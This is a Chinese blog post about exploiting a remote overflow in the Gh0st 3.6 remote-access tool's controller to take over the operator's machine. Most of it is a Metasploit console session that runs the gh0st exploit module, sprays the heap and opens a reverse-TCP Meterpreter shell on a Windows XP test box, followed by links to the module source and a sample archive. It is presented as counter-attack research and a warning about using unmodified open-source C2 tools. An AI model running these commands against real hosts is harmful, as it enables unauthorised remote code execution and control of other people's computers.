title: 利用Gh0st 3.6远程溢出漏洞反向控制攻击者
comments: true
toc: true
categories:
- [Metasploit]
- [Exp]
tags: - Metasploit
- Overflow
- Gh0st
date: 2020-01-12 18:30:10
abbrlink: 30568
前言
漏洞验证在2017年被公开,实际上Gh0st溢出漏洞在2009年时就已被人爆出过多个
可见使用开源C2工具,不见得安全,最好是经过二次修改,单纯做免杀可防不了哦
MSF
Teston WinXP at 2017-09-15
运行Gh0st客户端,然后通过MSF溢出C2客户端机器,即可反向获取攻击者机器权限
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set RHOST 192.168.1.126
RHOST => 192.168.1.126
msf exploit(gh0st) > run
[*] Started reverse TCP handler on 192.168.1.125:4444
[*] 192.168.1.126:80 - Trying target Gh0st Beta 3.6
[*] 192.168.1.126:80 - Spraying heap...
[*] 192.168.1.126:80 - Trying command 103...
[*] Sending stage (957999 bytes) to 192.168.1.126
[*] Meterpreter session 1 opened (192.168.1.125:4444 -> 192.168.1.126:1070) at 2017-09-15 16:22:56 +0800
[*] 192.168.1.126:80 - Server closed connection
meterpreter > sysinfo
Computer : K8ANTI-B2B9B81C
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
EXP
https://github.com/rapid7/metasploit-framework/blob/be66ed8af3c355b1280e1a2bdbe5dd1a74e7bc58/modules/exploits/windows/misc/gh0st.rb
https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip
来源:CSDN
作者:k8gege
链接:https://blog.csdn.net/k8gege/article/details/103949242